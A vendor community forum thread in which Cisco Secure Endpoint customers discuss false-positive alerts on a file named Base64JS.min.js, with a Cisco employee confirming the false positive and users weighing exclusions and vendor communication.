Buy or Renew
Buy or Renew
Duo Security forums now LIVE! Get answers to all your Duo Security questions. Learn more
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 
cancel
Start a conversation
2956
Views
12
Helpful
21
Replies

Base64JS.min.js

Go to solution
noahigros
Level 1
Level 1

‎10-05-2023 12:49 PM

Good afternoon, 

we are using Cisco AMP with our connector version being 8.2.1.21612 and are receiving numerous alerts for a filename Base64JS.min.js. Is anybody else experiencing this? Previously we had a widespread issue with a smss.exe parent process that was found to be an issue with a new BP update on Cisco's end for the same connector version we are on now. Could this be related? 

14 people had this problem
Labels:
21 Replies 21

Go to solution
Roman Valenta
Cisco Employee
Cisco Employee

‎10-06-2023 06:44 AM

The statement above is correct I just checked the internal ticket with TALOS and it was confirmed last night around 7pm EST that this is indeed FP event and will be removed from the detection list.

 

Go to solution
dotran
Level 1
Level 1

‎10-06-2023 07:25 AM

I entered that hash into Talos and it still shows as UNKNOWN.   

0 Helpful

Go to solution
noahigros
Level 1
Level 1

‎10-06-2023 10:32 AM

Final thoughts,

although we now have an accepted solution, for future reference you can also create an exclusion for events like this and apply it to your group policies. I personally don't tend to do that, as there is always the possibility of these events to be true and I wouldn't want to miss them. I've only done exclusions for very specific needs of an agency, but not an overarching file or action that's common across the board.

Go to solution
dotran
Level 1
Level 1
In response to noahigros

‎10-06-2023 10:39 AM - edited ‎10-06-2023 10:39 AM

That's what we did but prefer Cisco makes a public announcement and provide the updated signature files so the paying customers do not have to do any guess work.

Go to solution
noahigros
Level 1
Level 1
In response to dotran

‎10-06-2023 11:44 AM

Absolutely agree.

0 Helpful

Go to solution
Roman Valenta
Cisco Employee
Cisco Employee
In response to noahigros

‎10-06-2023 11:03 AM

I do 100% agree with this statement.  Secure Endpoint is definitely not "one click" solution there is many engines and factors that they play a big role in the final verdict and you guys have the power to control most of them. I also agree that FP events could be annoying and distracting but again SE is not just simple AV solution and in today world I rather be safe than sorry.

Also remember guys any doubts you have with False Positive or False Negative event TAC is here to help you and we treat these cases individually case by case. Most of them are resolved with in 24 hours from reporting, but there are cases like those caused by Exploit Prevention engine that are way more complicated than simple detection and those can take longer. So we appreciate the patience and support.

 

 

Go to solution
noahigros
Level 1
Level 1
In response to Roman Valenta

‎10-06-2023 11:52 AM

Agreed, and we greatly appreciate the help from the Cisco team. 

0 Helpful
Customers Also Viewed These Support Documents